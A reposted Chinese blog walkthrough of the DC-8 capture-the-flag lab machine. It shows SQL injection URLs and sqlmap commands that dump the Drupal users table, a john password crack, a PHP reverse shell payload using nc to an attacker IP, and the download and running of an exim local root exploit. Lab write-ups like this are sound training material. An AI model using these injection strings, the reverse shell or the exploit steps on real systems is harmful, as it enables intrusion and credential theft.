码迷,mamicode.com
首页 > 其他好文 > 详细

DC-8靶机

时间:2020-05-07 19:52:47      阅读:87      评论:0      收藏:0      [点我收藏+]

标签:john   移动   tle   stat   status   auto   rtl   str   map   

仅供个人娱乐

靶机信息

下载地址:http://www.five86.com/downloads/DC-8.zip

一、主机扫描

技术图片

二、信息收集

技术图片

http://192.168.17.135/robots.txt

技术图片
技术图片

三、漏洞的查找和利用

在前面点击Details的几个链接,然后发现url里有个nid参数,尝试检测注入

技术图片
技术图片
技术图片

数值型

技术图片
技术图片

数据库

http://192.168.17.135/?nid=-1%20union%20select%20database()--+

技术图片

爆破表

http://192.168.17.135/?nid=-1%20union%20select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27d7db%27--+

技术图片

字段

http://192.168.17.135/?nid=-1%20union%20select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27d7db%27%20and%20table_name=%27users%27--+

技术图片

爆破内容

http://192.168.17.135/?nid=-1 union select group_concat(name) from users--+

http://192.168.17.135/?nid=-1 union select group_concat(pass) from users--+

技术图片
技术图片

两个hash,md5无法解密

技术图片

或者sqlmap

技术图片

sqlmap --url http://192.168.17.135/?nid=1 --dbs

sqlmap --url http://192.168.17.135/?nid=1 -D d7db --tables

技术图片

sqlmap --url "http://192.168.17.135/?nid=1" -D d7db -T users --columns

sqlmap --url "http://192.168.17.135/?nid=1" -D d7db -T users -C name,pass --dump

技术图片

复制1.txt 用john破解

技术图片

破解出了john的密码,密码为turtle

登录后台信息收集

技术图片

没有路径 直接反弹

技术图片
技术图片

再次反弹

<p>1313</p>

<?php system("nc -e /bin/bash 192.168.17.129 4444"); echo "hello word"?>

技术图片
技术图片

python -c ‘import pty;pty.spawn("/bin/bash")‘

技术图片

信息收集

技术图片

find / -perm -u=s -type f2>/dev/null

技术图片

都拿去百度了,发现exim命令在使用时具有root权限,并且还看到一些有关于他的提权漏洞,那么在kali里面直接使用它对应版本的exp提权。

技术图片

1.apache 上传

/etc/init.d/apache2 start

wget http://192.168.17.129:8080/2.sh  失败了没搞定

技术图片

2.ssh 上传

修改ssh文件

技术图片
技术图片

ssh启动

开启:/etc/init.d/ssh start

重启:/etc/init.d/ssh restart

关闭:/etc/init.d/ssh stop

状态:/etc/init.d/ssh status

技术图片

scp root@192.168.17.129:/usr/share/exploitdb/exploits/linux/local/46996.sh /tmp/

技术图片

3.简易http

python -m SimpleHTTPServer

wget http://192.168.17.129:8000/getShell.sh

技术图片

文件移动到tmp 
chmod 777 getShell.sh

根据脚本提示,执行脚本文件并添加命令参数,执行后获取到root权限,并找到flag.txt文件

./getShell.sh -m netcat

技术图片

解决方法

技术图片

sed -i "s/\r//" getShell.sh

./getShell.sh -m netcat

技术图片
技术图片

DC-8靶机

标签:john   移动   tle   stat   status   auto   rtl   str   map   

原文地址:https://www.cnblogs.com/bingtang123/p/12838421.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!